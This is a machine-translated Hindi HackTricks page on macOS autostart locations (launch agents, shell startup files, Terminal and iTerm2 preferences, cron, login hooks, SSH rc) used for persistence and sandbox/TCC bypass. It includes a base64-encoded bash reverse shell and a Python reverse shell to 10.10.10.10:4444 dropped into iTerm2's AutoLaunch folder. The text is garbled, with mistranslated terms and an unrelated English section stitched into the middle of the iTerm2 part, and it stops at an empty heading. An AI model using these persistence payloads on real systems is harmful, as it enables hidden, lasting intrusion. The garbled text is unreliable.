# macOS ऑटो स्टार्ट
जानें AWS हैकिंग को शून्य से हीरो तकhtARTE (HackTricks AWS Red Team Expert) के साथ!
HackTricks का समर्थन करने के अन्य तरीके:
* यदि आप अपनी **कंपनी का विज्ञापन HackTricks में देखना चाहते हैं** या **HackTricks को PDF में डाउनलोड करना चाहते हैं** तो [**सब्सक्रिप्शन प्लान्स देखें**](https://github.com/sponsors/carlospolop)!
* [**आधिकारिक PEASS और HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
* हमारा विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह, [**The PEASS Family**](https://opensea.io/collection/the-peass-family) खोजें
* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)** पर फॉलो** करें।
* **हैकिंग ट्रिक्स साझा करें और PRs सबमिट करके** [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos में।
यह खंड ब्लॉग श्रृंखला [**Beyond the good ol' LaunchAgents**](https://theevilbit.github.io/beyond/) पर आधारित है, उद्देश्य है **अधिक Autostart स्थान** (यदि संभव हो) जोड़ना, **नवीनतम macOS संस्करण (13.4) के साथ कौन-कौने तकनीक काम कर रही हैं** और **आवश्यक अनुमतियाँ** निर्दिष्ट करना।
## सैंडबॉक्स बाइपास
{% hint style="success" %}
यहाँ आपको सैंडबॉक्स बाइपास के लिए उपयोगी स्टार्ट स्थान मिलेंगे जो आपको केवल कुछ को **एक फ़ाइल में लिखकर** और बहुत **सामान्य क्रिया** के लिए **प्रतीक्षा** करके **कुछ को निष्पादित करने** की अनुमति देता है, एक निर्धारित **समय की मात्रा** या एक **क्रिया जो आप सामान्य रूप से सैंडबॉक्स के अंदर से बिना रूट अनुमतियों की आवश्यकता के कुछ कर सकते हैं**।
{% endhint %}
### Launchd
* सैंडबॉक्स बाइपास के लिए उपयोगी: [✅](https://emojipedia.org/check-mark-button)
* TCC बाइपास: [🔴](https://emojipedia.org/large-red-circle)
#### स्थान
* **`/Library/LaunchAgents`**
* **ट्रिगर**: पुनरारंभ
* रूट आवश्यक
* **`/Library/LaunchDaemons`**
* **ट्रिगर**: पुनरारंभ
* रूट आवश्यक
* **`/System/Library/LaunchAgents`**
* **ट्रिगर**: पुनरारंभ
* रूट आवश्यक
* **`/System/Library/LaunchDaemons`**
* **ट्रिगर**: पुनरारंभ
* रूट आवश्यक
* **`~/Library/LaunchAgents`**
* **ट्रिगर**: पुनरारंभ
* **`~/Library/LaunchDemons`**
* **ट्रिगर**: पुनरारंभ
#### विवरण और शोषण
**`launchd`** ओएक्स एस कर्नेल द्वारा स्टार्टअप पर पहला **प्रक्रिया** है और शट डाउन पर अंतिम होने वाला है। इसे हमेशा **पीआईडी 1** होना चाहिए। यह प्रक्रिया **ASEP** **प्लिस्ट** में निर्दिष्ट की गई विन्यासों को **पढ़े और निष्पादित** करेगा:
* `/Library/LaunchAgents`: प्रशासक द्वारा स्थापित प्रति-उपयोगकर्ता एजेंट्स
* `/Library/LaunchDaemons`: प्रशासक द्वारा स्थापित सिस्टम-व्यापी डेमन्स
* `/System/Library/LaunchAgents`: Apple द्वारा प्रदान किए गए प्रति-उपयोगकर्ता एजेंट्स।
* `/System/Library/LaunchDaemons`: Apple द्वारा प्रदान किए गए सिस्टम-व्यापी डेमन्स।
जब एक उपयोगकर्ता लॉग इन करता है, तो `/Users/$USER/Library/LaunchAgents` और `/Users/$USER/Library/LaunchDemons` में प्लिस्ट मौजूद होते हैं और **लॉग इन करने वाले उपयोगकर्ताओं की अनुमतियों** के साथ शुरू होते हैं।
**एजेंट्स और डेमन्स के मुख्य अंतर है कि एजेंट्स उपयोगकर्ता लॉग इन करते समय लोड होते हैं और डेमन्स सिस्टम स्टार्टअप पर लोड होते हैं** (क्योंकि एसएसएच जैसी सेवाएं हैं जो किसी भी उपयोगकर्ता को सिस्टम तक पहुंचने से पहले निष्पादित होने की आवश्यकता होती है)। इसके अलावा, एजेंट्स जीयूआई का उपयोग कर सकते हैं जबकि डेमन्स को पिछले प्लान में चलाने की आवश्यकता होती है।
```xml
Labelcom.apple.someidentifierProgramArgumentsbash -c 'touch /tmp/launched'RunAtLoadStartInterval800KeepAliveSuccessfulExit
```
ऐसे मामले होते हैं जहां **एक एजेंट को उपयोगकर्ता लॉगिन करने से पहले चलाया जाना चाहिए**, इन्हें **प्रीलॉगिन एजेंट्स** कहा जाता है। उदाहरण के लिए, यह लॉगिन पर सहायक प्रौद्योगिकी प्रदान करने के लिए उपयोगी है। इन्हें `/Library/LaunchAgents` में भी पाया जा सकता है (एक उदाहरण के लिए [**यहाँ**](https://github.com/HelmutJ/CocoaSampleCode/tree/master/PreLoginAgents) देखें)।
{% hint style="info" %}
नए डेमन या एजेंट कॉन्फ़िग फ़ाइलें **अगले रीबूट के बाद या** `launchctl load ` **का उपयोग करके लोड की जाएंगी**। **इसके अलावा, .plist फ़ाइलें बिना उस एक्सटेंशन के भी लोड किया जा सकता है** `launchctl -F ` (हालांकि वे plist फ़ाइलें रीबूट के बाद स्वचालित रूप से लोड नहीं होंगी)।\
इसे `launchctl unload ` के साथ **अनलोड** करना भी संभव है (इसके द्वारा इसे संकेत किया गया प्रक्रिया समाप्त हो जाएगी)।
सुनिश्चित करने के लिए कि कोई **भी चीज़** (जैसे ओवरराइड) **किसी एजेंट या डेमन को चलाने से रोक रही है**, यह सुनिश्चित करें: `sudo launchctl load -w /System/Library/LaunchDaemos/com.apple.smdb.plist`
{% endhint %}
वर्तमान उपयोगकर्ता द्वारा लोड किए गए सभी एजेंट और डेमन की सूची:
```bash
launchctl list
```
{% hint style="warning" %}
यदि एक plist एक उपयोगकर्ता के द्वारा स्वामित्व में है, तो यदि यह एक डेमन सिस्टम वाइड फोल्डर में है, **कार्य उपयोगकर्ता के रूप में** और न कि रूट के रूप में निष्पादित किया जाएगा। यह कुछ प्रिविलेज उन्नति हमलों को रोक सकता है।
{% endhint %}
### शैल स्टार्टअप फ़ाइलें
लेख: [https://theevilbit.github.io/beyond/beyond\_0001/](https://theevilbit.github.io/beyond/beyond\_0001/)\
लेख (xterm): [https://theevilbit.github.io/beyond/beyond\_0018/](https://theevilbit.github.io/beyond/beyond\_0018/)
* सैंडबॉक्स को छलने के लिए उपयोगी: [✅](https://emojipedia.org/check-mark-button)
* TCC बायपास: [✅](https://emojipedia.org/check-mark-button)
* लेकिन आपको एक एप्लिकेशन ढूंढने की आवश्यकता है जिसमें TCC बायपास हो जो इन फ़ाइलों को लोड करता है
#### स्थान
* **`~/.zshrc`, `~/.zlogin`, `~/.zshenv.zwc`**, **`~/.zshenv`, `~/.zprofile`**
* **ट्रिगर**: zsh के साथ एक टर्मिनल खोलें
* **`/etc/zshenv`, `/etc/zprofile`, `/etc/zshrc`, `/etc/zlogin`**
* **ट्रिगर**: zsh के साथ एक टर्मिनल खोलें
* रूट की आवश्यकता है
* **`~/.zlogout`**
* **ट्रिगर**: zsh के साथ एक टर्मिनल से बाहर निकलें
* **`/etc/zlogout`**
* **ट्रिगर**: zsh के साथ एक टर्मिनल से बाहर निकलें
* रूट की आवश्यकता है
* संभावना है कि और भी हो: **`man zsh`**
* **`~/.bashrc`**
* **ट्रिगर**: bash के साथ एक टर्मिनल खोलें
* `/etc/profile` (काम नहीं किया)
* `~/.profile` (काम नहीं किया)
* `~/.xinitrc`, `~/.xserverrc`, `/opt/X11/etc/X11/xinit/xinitrc.d/`
* **ट्रिगर**: xterm के साथ ट्रिगर होने की उम्मीद है, लेकिन यह **स्थापित नहीं है** और स्थापित करने के बाद भी यह त्रुटि फेंकी जाती है: xterm: `DISPLAY is not set`
#### विवरण और शोषण
जब `zsh` या `bash` जैसे शैल पर्यावरण प्रारंभ किया जाता है, **निश्चित स्टार्टअप फ़ाइलें चलाई जाती हैं**। macOS वर्तमान में डिफ़ॉल्ट शैल के रूप में `/bin/zsh` का उपयोग करता है। यह शैल स्वचालित रूप से पहुंचा जाता है जब टर्मिनल एप्लिकेशन लॉन्च किया जाता है या जब एक डिवाइस SSH के माध्यम से एक्सेस किया जाता है। जबकि `bash` और `sh` भी macOS में मौजूद हैं, उन्हें उपयोग करने के लिए स्पष्ट रूप से आमंत्रित किया जाना चाहिए।
हम `man zsh` के साथ पढ़ सकते हैं जो शैल स्टार्टअप फ़ाइलों का एक लंबा विवरण है।
```bash
# Example executino via ~/.zshrc
echo "touch /tmp/hacktricks" >> ~/.zshrc
```
### फिर से खुलने वाले एप्लिकेशन
{% hint style="danger" %}
सूचित अनुशासन को कॉन्फ़िगर करना और लॉगआउट और लॉगइन या बूट करना मेरे लिए काम नहीं किया एप्लिकेशन को निष्पादित करने के लिए। (एप्लिकेशन नहीं चल रहा था, शायद यह चालू होना चाहिए जब ये कार्रवाई की जाती है)
{% endhint %}
**Writeup**: [https://theevilbit.github.io/beyond/beyond\_0021/](https://theevilbit.github.io/beyond/beyond\_0021/)
* सैंडबॉक्स को छलने के लिए उपयोगी: [✅](https://emojipedia.org/check-mark-button)
* TCC छलना: [🔴](https://emojipedia.org/large-red-circle)
#### स्थान
* **`~/Library/Preferences/ByHost/com.apple.loginwindow..plist`**
* **ट्रिगर**: एप्लिकेशनों को फिर से खोलने की पुनरारंभ करें
#### विवरण और छलन
सभी एप्लिकेशन फिर से खोलने के लिए `~/Library/Preferences/ByHost/com.apple.loginwindow..plist` में हैं।
इसलिए, अपनी एप्लिकेशन को सूची में जोड़ने के लिए आपको **अपनी एप्लिकेशन को जोड़ना होगा**।
UUID उस निर्देशिका को सूचीबद्ध करके या `ioreg -rd1 -c IOPlatformExpertDevice | awk -F'"' '/IOPlatformUUID/{print $4}'` के साथ पाया जा सकता है।
फिर से खोले जाने वाले एप्लिकेशनों की जांच करने के लिए आप यह कर सकते हैं:
```bash
defaults -currentHost read com.apple.loginwindow TALAppsToRelaunchAtLogin
#or
plutil -p ~/Library/Preferences/ByHost/com.apple.loginwindow..plist
```
**इस सूची में एक एप्लिकेशन जोड़ने** के लिए आप इस्तेमाल कर सकते हैं:
```bash
# Adding iTerm2
/usr/libexec/PlistBuddy -c "Add :TALAppsToRelaunchAtLogin: dict" \
-c "Set :TALAppsToRelaunchAtLogin:$:BackgroundState 2" \
-c "Set :TALAppsToRelaunchAtLogin:$:BundleID com.googlecode.iterm2" \
-c "Set :TALAppsToRelaunchAtLogin:$:Hide 0" \
-c "Set :TALAppsToRelaunchAtLogin:$:Path /Applications/iTerm.app" \
~/Library/Preferences/ByHost/com.apple.loginwindow..plist
```
### टर्मिनल प्राथमिकताएँ
* सैंडबॉक्स को छलने के लिए उपयोगी: [✅](https://emojipedia.org/check-mark-button)
* TCC छलना: [✅](https://emojipedia.org/check-mark-button)
* उपयोगकर्ता की एफडीए अनुमतियों के लिए टर्मिनल का उपयोग करें
#### स्थान
* **`~/Library/Preferences/com.apple.Terminal.plist`**
* **ट्रिगर**: टर्मिनल खोलें
#### विवरण और शोषण
**`~/Library/Preferences`** में एप्लिकेशन में उपयोगकर्ता की प्राथमिकताएँ संग्रहीत हैं। इनमें से कुछ प्राथमिकताएँ **अन्य एप्लिकेशन/स्क्रिप्ट को निष्पादित करने** के लिए एक विन्यास रख सकती हैं।
उदाहरण के लिए, टर्मिनल स्टार्टअप में एक कमांड निष्पादित कर सकती है:
यह विन्यास फ़ाइल **`~/Library/Preferences/com.apple.Terminal.plist`** में इस प्रकार दर्शाया जाता है:
```bash
[...]
"Window Settings" => {
"Basic" => {
"CommandString" => "touch /tmp/terminal_pwn"
"Font" => {length = 267, bytes = 0x62706c69 73743030 d4010203 04050607 ... 00000000 000000cf }
"FontAntialias" => 1
"FontWidthSpacing" => 1.004032258064516
"name" => "Basic"
"ProfileCurrentVersion" => 2.07
"RunCommandAsShell" => 0
"type" => "Window Settings"
}
[...]
```
इसलिए, अगर सिस्टम में टर्मिनल की प्राथमिकताओं की plist को अधिलेखित किया जा सकता है, तो **`open`** कार्यक्षमता का उपयोग करके **टर्मिनल खोली जा सकती है और उस कमांड को क्रियान्वित किया जाएगा**।
आप इसे क्लाइ से जोड़ सकते हैं:
{% code overflow="wrap" %}
```bash
# Add
/usr/libexec/PlistBuddy -c "Set :\"Window Settings\":\"Basic\":\"CommandString\" 'touch /tmp/terminal-start-command'" $HOME/Library/Preferences/com.apple.Terminal.plist
/usr/libexec/PlistBuddy -c "Set :\"Window Settings\":\"Basic\":\"RunCommandAsShell\" 0" $HOME/Library/Preferences/com.apple.Terminal.plist
# Remove
/usr/libexec/PlistBuddy -c "Set :\"Window Settings\":\"Basic\":\"CommandString\" ''" $HOME/Library/Preferences/com.apple.Terminal.plist
```
{% endcode %}
### टर्मिनल स्क्रिप्ट / अन्य फ़ाइल एक्सटेंशन
* सैंडबॉक्स को छलना करने के लिए उपयोगी: [✅](https://emojipedia.org/check-mark-button)
* TCC छलना: [✅](https://emojipedia.org/check-mark-button)
* उपयोगकर्ता को उसका उपयोग करने के लिए टर्मिनल को एफडीए अनुमतियाँ होती हैं
#### स्थान
* **कहीं भी**
* **ट्रिगर**: टर्मिनल खोलें
#### विवरण और शोषण
यदि आप एक [**`.terminal`** स्क्रिप्ट](https://stackoverflow.com/questions/32086004/how-to-use-the-default-terminal-settings-when-opening-a-terminal-file-osx) बनाते हैं और उसे खोलते हैं, तो **टर्मिनल एप्लिकेशन** स्वचालित रूप से आमंत्रित होगा ताकि वहाँ निर्दिष्ट कमांड को निष्पादित कर सके। यदि टर्मिनल ऐप के पास कुछ विशेष अधिकार हैं (जैसे TCC), तो आपका कमांड उन विशेष अधिकारों के साथ चलाया जाएगा।
इसे इस प्रकार से प्रयास करें:
```bash
# Prepare the payload
cat > /tmp/test.terminal << EOF
CommandStringmkdir /tmp/Documents; cp -r ~/Documents /tmp/Documents;ProfileCurrentVersion2.0600000000000001RunCommandAsShellnameexploittypeWindow Settings
EOF
# Trigger it
open /tmp/test.terminal
# Use something like the following for a reverse shell:
echo -n "YmFzaCAtaSA+JiAvZGV2L3RjcC8xMjcuMC4wLjEvNDQ0NCAwPiYxOw==" | base64 -d | bash;
```
### Audio Plugins
लिखित विवरण: [https://theevilbit.github.io/beyond/beyond\_0013/](https://theevilbit.github.io/beyond/beyond\_0013/)\
लिखित विवरण: [https://posts.specterops.io/audio-unit-plug-ins-896d3434a882](https://posts.specterops.io/audio-unit-plug-ins-896d3434a882)
* सैंडबॉक्स को छलने के लिए उपयोगी: [✅](https://emojipedia.org/check-mark-button)
* TCC छलने: [🟠](https://emojipedia.org/large-orange-circle)
* आपको कुछ अतिरिक्त TCC एक्सेस मिल सकता है
#### स्थान
* **`/Library/Audio/Plug-Ins/HAL`**
* रूट की आवश्यकता है
* **ट्रिगर**: coreaudiod या कंप्यूटर को पुनरारंभ करें
* **`/Library/Audio/Plug-ins/Components`**
* रूट की आवश्यकता है
* **ट्रिगर**: coreaudiod या कंप्यूटर को पुनरारंभ करें
* **`~/Library/Audio/Plug-ins/Components`**
* **ट्रिगर**: coreaudiod या कंप्यूटर को पुनरारंभ करें
* **`/System/Library/Components`**
* रूट की आवश्यकता है
* **ट्रिगर**: coreaudiod या कंप्यूटर को पुनरारंभ करें
#### विवरण
पिछले लेखों के अनुसार **कुछ ऑडियो प्लगइन्स को कंपाइल** करना संभव है और उन्हें लोड करने के लिए।
### QuickLook Plugins
लिखित विवरण: [https://theevilbit.github.io/beyond/beyond\_0028/](https://theevilbit.github.io/beyond/beyond\_0028/)
* सैंडबॉक्स को छलने के लिए उपयोगी: [✅](https://emojipedia.org/check-mark-button)
* TCC छलने: [🟠](https://emojipedia.org/large-orange-circle)
* आपको कुछ अतिरिक्त TCC एक्सेस मिल सकता है
#### स्थान
* `/System/Library/QuickLook`
* `/Library/QuickLook`
* `~/Library/QuickLook`
* `/Applications/AppNameHere/Contents/Library/QuickLook/`
* `~/Applications/AppNameHere/Contents/Library/QuickLook/`
#### विवरण और शोषण
QuickLook प्लगइन्स को आप जब आप एक फ़ाइल का पूर्वावलोकन ट्रिगर करते हैं (फाइंडर में फ़ाइल का चयन करके स्पेस बार दबाएं) और एक **फ़ाइल प्रकार का समर्थन करने वाला प्लगइन** स्थापित होता है, तो उसे निष्पादित किया जा सकता है।
अपना खुद का QuickLook प्लगइन कंपाइल करना संभव है, उसे पिछले स्थानों में रखना और फिर समर्थित फ़ाइल पर जाने और उसे ट्रिगर करने के लिए स्पेस दबाने के लिए।
### ~~लॉगिन/लॉगआउट हुक्स~~
{% hint style="danger" %}
यह मेरे लिए काम नहीं किया, न तो उपयोगकर्ता लॉगइनहुक और न ही रूट लॉगआउटहुक
{% endhint %}
**लिखित विवरण**: [https://theevilbit.github.io/beyond/beyond\_0022/](https://theevilbit.github.io/beyond/beyond\_0022/)
* सैंडबॉक्स को छलने के लिए उपयोगी: [✅](https://emojipedia.org/check-mark-button)
* TCC छलने: [🔴](https://emojipedia.org/large-red-circle)
#### स्थान
* आपको `defaults write com.apple.loginwindow LoginHook /Users/$USER/hook.sh` जैसी कुछ चला सकने की आवश्यकता है
* `Lo`cated in `~/Library/Preferences/com.apple.loginwindow.plist`
वे पुराने हैं लेकिन उपयोगकर्ता लॉग इन करते समय कमांड निष्पादित करने के लिए उपयोग किया जा सकता है।
```bash
cat > $HOME/hook.sh << EOF
#!/bin/bash
echo 'My is: \`id\`' > /tmp/login_id.txt
EOF
chmod +x $HOME/hook.sh
defaults write com.apple.loginwindow LoginHook /Users/$USER/hook.sh
defaults write com.apple.loginwindow LogoutHook /Users/$USER/hook.sh
```
यह सेटिंग `/Users/$USER/Library/Preferences/com.apple.loginwindow.plist` में स्टोर की जाती है।
```bash
defaults read /Users/$USER/Library/Preferences/com.apple.loginwindow.plist
{
LoginHook = "/Users/username/hook.sh";
LogoutHook = "/Users/username/hook.sh";
MiniBuddyLaunch = 0;
TALLogoutReason = "Shut Down";
TALLogoutSavesState = 0;
oneTimeSSMigrationComplete = 1;
}
```
इसे हटाने के लिए:
```bash
defaults delete com.apple.loginwindow LoginHook
defaults delete com.apple.loginwindow LogoutHook
```
The root user one is stored in **`/private/var/root/Library/Preferences/com.apple.loginwindow.plist`**
## शर्ताधीन सैंडबॉक्स बाईपास
{% hint style="success" %}
यहाँ आपको **सैंडबॉक्स बाईपास** के लिए उपयोगी स्टार्ट स्थान मिलेंगे जो आपको बस किसी चीज को **एक फ़ाइल में लिखकर** एक्सीक्यूट करने की अनुमति देते हैं और **अपेक्षा नहीं करते हैं कि विशेष रूप से "असामान्य" प्रोग्राम** स्थापित हों, "असामान्य" उपयोगकर्ता क्रियाएँ या परिवेश।
{% endhint %}
### क्रॉन
**लेखन**: [https://theevilbit.github.io/beyond/beyond\_0004/](https://theevilbit.github.io/beyond/beyond\_0004/)
* सैंडबॉक्स को बाईपास करने के लिए उपयोगी: [✅](https://emojipedia.org/check-mark-button)
* हालांकि, आपको `crontab` बाइनरी को एक्सीक्यूट करने की क्षमता होनी चाहिए
* या फिर रूट होना चाहिए
* TCC बाईपास: [🔴](https://emojipedia.org/large-red-circle)
#### स्थान
* **`/usr/lib/cron/tabs/`, `/private/var/at/tabs`, `/private/var/at/jobs`, `/etc/periodic/`**
* सीधी लेखन पहुंच के लिए रूट की आवश्यकता है। यदि आप `crontab ` को एक्सीक्यूट कर सकते हैं तो रूट की आवश्यकता नहीं है
* **ट्रिगर**: क्रॉन जॉब पर निर्भर करेगा
#### विवरण और शोषण
```bash
crontab -l
```
आप **`/usr/lib/cron/tabs/`** और **`/var/at/tabs/`** में उपयोगकर्ताओं के सभी cron jobs देख सकते हैं (रूट की आवश्यकता है)।
मैकओएस में कई फोल्डर्स में **निश्चित अंतराल** के साथ स्क्रिप्ट्स को निष्पादित किया जा सकता है:
```bash
# The one with the cron jobs is /usr/lib/cron/tabs/
ls -lR /usr/lib/cron/tabs/ /private/var/at/jobs /etc/periodic/
```
वहाँ आपको नियमित **cron** **जॉब्स**, **at** **जॉब्स** (कम प्रयोग किया जाता है) और **periodic** **जॉब्स** (मुख्य रूप से अस्थायी फ़ाइलें साफ करने के लिए प्रयोग किया जाता है) मिलेंगे। दैनिक periodic jobs को उदाहरण के लिए इस तरह से निष्पादित किया जा सकता है: `periodic daily`।
**प्रोग्रामेटिक रूप से एक उपयोगकर्ता cronjob जोड़ने** के लिए निम्नलिखित का प्रयोग किया जा सकता है:
```bash
echo '* * * * * /bin/bash -c "touch /tmp/cron3"' > /tmp/cron
crontab /tmp/cron
```
### iTerm2
Writeup: [https://theevilbit.github.io/beyond/beyond\_0002/](https://theevilbit.github.io/beyond/beyond\_0002/)
* बालूबक्स को छलने के लिए उपयोगी: [✅](https://emojipedia.org/check-mark-button)
* TCC बायपास: [✅](https://emojipedia.org/check-mark-button)
* iTerm2 को TCC अनुमतियाँ देने का उपयोग किया गया था
#### स्थान
* **`~/Library/Application Support/iTerm2/Scripts/AutoLaunch`**
* **ट्रिगर**: iTerm खोलें
* **`~/Library/Application Support/iTerm2/Scripts/AutoLaunch.scpt`**
* **ट्रिगर**: iTerm खोलें
* **`~/Library/Preferences/com.googlecode.iterm2.plist`**
* **ट्रिगर**: iTerm खोलें
#### विवरण और शोषण
**`~/Library/Application Support/iTerm2/Scripts/AutoLaunch`** में संग्रहीत स्क्रिप्ट क्रियान्वित किए जाएंगे। उदाहरण के लिए:
```bash
cat > "$HOME/Library/Application Support/iTerm2/Scripts/AutoLaunch/a.sh" << EOF
#!/bin/bash
touch /tmp/iterm2-autolaunch
EOF
chmod +x "$HOME/Library/Application Support/iTerm2/Scripts/AutoLaunch/a.sh"
```
### macOS Auto Start Locations
#### Launch Agents
Launch Agents are used to run processes when a user logs in. They are located in `~/Library/LaunchAgents/` and `/Library/LaunchAgents/`.
#### Launch Daemons
Launch Daemons are used to run processes at system boot or login. They are located in `/Library/LaunchDaemons/`.
#### Login Items
Login Items are applications that open when a user logs in. They can be managed in `System Preferences > Users & Groups > Login Items`.
#### Startup Items
Startup Items are legacy items that automatically launch when a user logs in. They are located in `/Library/StartupItems/`.
```bash
cat > "$HOME/Library/Application Support/iTerm2/Scripts/AutoLaunch/a.py" << EOF
#!/usr/bin/env python3
import iterm2,socket,subprocess,os
async def main(connection):
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('10.10.10.10',4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(['zsh','-i']);
async with iterm2.CustomControlSequenceMonitor(
connection, "shared-secret", r'^create-window$') as mon:
while True:
match = await mon.async_get()
await iterm2.Window.async_create(connection)
iterm2.run_forever(main)
EOF
```
स्क्रिप्ट **`~/Library/Application Support/iTerm2/Scripts/AutoLaunch.scpt`** भी निष्पादित किया जाएगा:
```bash
do shell script "touch /tmp/iterm2-autolaunchscpt"
```
iTerm2 प्राथमिकताएं **`~/Library/Preferences/com.googlecode.iterm2.plist`** में स्थित होती हैं जो **इसका संकेत दे सकती हैं कि कौन सा कमांड निष्पादित करने के लिए** जब iTerm2 टर्मिनल खोला जाता है।
यह सेटिंग iTerm2 सेटिंग्स में कॉन्फ़िगर की जा सकती है:
और कमांड प्राथमिकताओं में प्रतिबिम्बित होता है:
```bash
plutil -p com.googlecode.iterm2.plist
{
[...]
"New Bookmarks" => [
0 => {
[...]
"Initial Text" => "touch /tmp/iterm-start-command"
```
आप निम्नलिखित के साथ कमांड सेट कर सकते हैं:
{% code overflow="wrap" %}
```bash
# Add
/usr/libexec/PlistBuddy -c "Set :\"New Bookmarks\":0:\"Initial Text\" 'touch /tmp/iterm-start-command'" $HOME/Library/Preferences/com.googlecode.iterm2.plist
# Call iTerm
open /Applications/iTerm.app/Contents/MacOS/iTerm2
# Remove
/usr/libexec/PlistBuddy -c "Set :\"New Bookmarks\":0:\"Initial Text\" ''" $HOME/Library/Preferences/com.googlecode.iterm2.plist
```
{% endcode %}
{% hint style="warning" %}
उच्च संभावना है कि **iTerm2 preferences** का दुरुपयोग करने के लिए **अन्य तरीके** हों।
{% endhint %}
### xbar
लेख: [https://theevilbit.github.io/beyond/beyond\_0007/](https://theevilbit.github.io/beyond/beyond\_0007/)
* सैंडबॉक्स को छलने के लिए उपयोगी: [✅](https://emojipedia.org/check-mark-button)
* लेकिन xbar को स्थापित किया जाना चाहिए
* TCC बायपास: [✅](https://emojipedia.org/check-mark-button)
* यह पहुंचने की अनुमतियां मांगता है
#### स्थान
* **`~/Library/Application\ Support/xbar/plugins/`**
* **ट्रिगर**: जब xbar क्रियान्वित होता है
#### विवरण
यदि लोकप्रिय कार्यक्रम [**xbar**](https://github.com/matryer/xbar) स्थापित है, तो संभावना है कि एक शैल स्क्रिप्ट लिखा जा सकता है **`~/Library/Application\ Support/xbar/plugins/`** जिसे xbar शुरू होने पर क्रियान्वित किया जाए:
```bash
cat > "$HOME/Library/Application Support/xbar/plugins/a.sh" << EOF
#!/bin/bash
touch /tmp/xbar
EOF
chmod +x "$HOME/Library/Application Support/xbar/plugins/a.sh"
```
### Hammerspoon
**लेखन**: [https://theevilbit.github.io/beyond/beyond\_0008/](https://theevilbit.github.io/beyond/beyond\_0008/)
* सैंडबॉक्स को छलने के लिए उपयोगी: [✅](https://emojipedia.org/check-mark-button)
* लेकिन Hammerspoon को स्थापित किया जाना चाहिए
* TCC छलावा: [✅](https://emojipedia.org/check-mark-button)
* यह पहुंचने की अनुमतियाँ मांगता है
#### स्थान
* **`~/.hammerspoon/init.lua`**
* **ट्रिगर**: जब Hammerspoon को क्रियान्वित किया जाता है
#### विवरण
[**Hammerspoon**](https://github.com/Hammerspoon/hammerspoon) **macOS** के लिए एक स्वचालन प्लेटफ़ॉर्म के रूप में काम करता है, जिसमें इसके परिचालन के लिए **LUA स्क्रिप्टिंग भाषा** का उपयोग किया जाता है। विशेष रूप से, यह पूरे AppleScript कोड का एकीकरण समर्थन करता है और शैल स्क्रिप्टों का क्रियान्वयन करता है, जिससे इसकी स्क्रिप्टिंग क्षमताएँ काफी बढ़ जाती हैं।
ऐप एक एकल फ़ाइल, `~/.hammerspoon/init.lua`, की खोज करता है, और जब शुरू किया जाता है, तो स्क्रिप्ट क्रियान्वित होगा।
```bash
mkdir -p "$HOME/.hammerspoon"
cat > "$HOME/.hammerspoon/init.lua" << EOF
hs.execute("/Applications/iTerm.app/Contents/MacOS/iTerm2")
EOF
```
### BetterTouchTool
* बैंडबॉक्स को छलने के लिए उपयोगी: [✅](https://emojipedia.org/check-mark-button)
* लेकिन BetterTouchTool को स्थापित होना चाहिए
* TCC बायपास: [✅](https://emojipedia.org/check-mark-button)
* यह Automation-Shortcuts और Accessibility अनुमतियां मांगता है
#### स्थान
* `~/Library/Application Support/BetterTouchTool/*`
यह उपकरण इसका संकेत देने की अनुमति देता है कि किसी ऐप्लिकेशन या स्क्रिप्ट को किसी शॉर्टकट को दबाने पर क्रियान्वित करने के लिए। एक हमलावर अपने खुद के **शॉर्टकट और क्रिया को डेटाबेस में क्रियान्वित करने के लिए** कॉन्फ़िगर कर सकता है ताकि यह विचारशील कोड को क्रियान्वित करे (एक शॉर्टकट केवल एक कुंजी दबाने के लिए हो सकता है)।
### Alfred
* बैंडबॉक्स को छलने के लिए उपयोगी: [✅](https://emojipedia.org/check-mark-button)
* लेकिन Alfred को स्थापित होना चाहिए
* TCC बायपास: [✅](https://emojipedia.org/check-mark-button)
* यह Automation, Accessibility और फुल-डिस्क एक्सेस अनुमतियां मांगता है
#### स्थान
* `???`
यह वर्कफ़्लो बनाने की अनुमति देता है जो कि निश्चित स्थितियों पर कोड को क्रियान्वित कर सकता है। संभावना है कि एक हमलावर एक वर्कफ़्लो फ़ाइल बना सकता है और Alfred को इसे लोड करने के लिए बना सकता है (वर्कफ़्लो का उपयोग करने के लिए प्रीमियम संस्करण का उपयोग करना आवश्यक है)।
### SSHRC
लेख: [https://theevilbit.github.io/beyond/beyond\_0006/](https://theevilbit.github.io/beyond/beyond\_0006/)
* बैंडबॉक्स को छलने के लिए उपयोगी: [✅](https://emojipedia.org/check-mark-button)
* लेकिन ssh को सक्षम और उपयोग किया जाना चाहिए
* TCC बायपास: [✅](https://emojipedia.org/check-mark-button)
* SSH को FDA एक्सेस होने की आवश्यकता है
#### स्थान
* **`~/.ssh/rc`**
* **ट्रिगर**: SSH के माध्यम से लॉगिन
* **`/etc/ssh/sshrc`**
* रूट की आवश्यकता है
* **ट्रिगर**: SSH के माध्यम से लॉगिन
{% hint style="danger" %}
SSH को चालू करने के लिए पूर्ण डिस्क एक्सेस की आवश्यकता है:
```bash
sudo systemsetup -setremotelogin on
```
{% endhint %}
#### विवरण और शोषण
डिफ़ॉल्ट रूप से, जब तक `/etc/ssh/sshd_config` में `PermitUserRC no` न हो, जब एक उपयोगकर्ता **SSH के माध्यम से लॉगिन** करता है, स्क्रिप्ट **`/etc/ssh/sshrc`** और **`~/.ssh/rc`** क्रियान्वित हो जाएंगे।
### **लॉगिन आइटम्स**
लेख: [https://theevilbit.github.io/beyond/beyond\_0003/](https://theevilbit.github.io/beyond/beyond\_0003/)
* सैंडबॉक्स को छलने के लिए उपयोगी: [✅](https://emojipedia.org/check-mark-button)
* लेकिन आपको `osascript` को तार देना होगा
* TCC छलांग: [🔴](https://emojipedia.org/large-red-circle)
#### स्थान
* **`~/Library/Application Support/com.apple.backgroundtaskmanagementagent`**
* **ट्रिगर:** लॉगिन
* शोषण पेलोड संग्रहित करने के लिए **`osascript`** को कॉल किया गया है
* **`/var/db/com.apple.xpc.launchd/loginitems.501.plist`**
* **ट्रिगर:** लॉगिन
* रूट की आवश्यकता है
#### विवरण
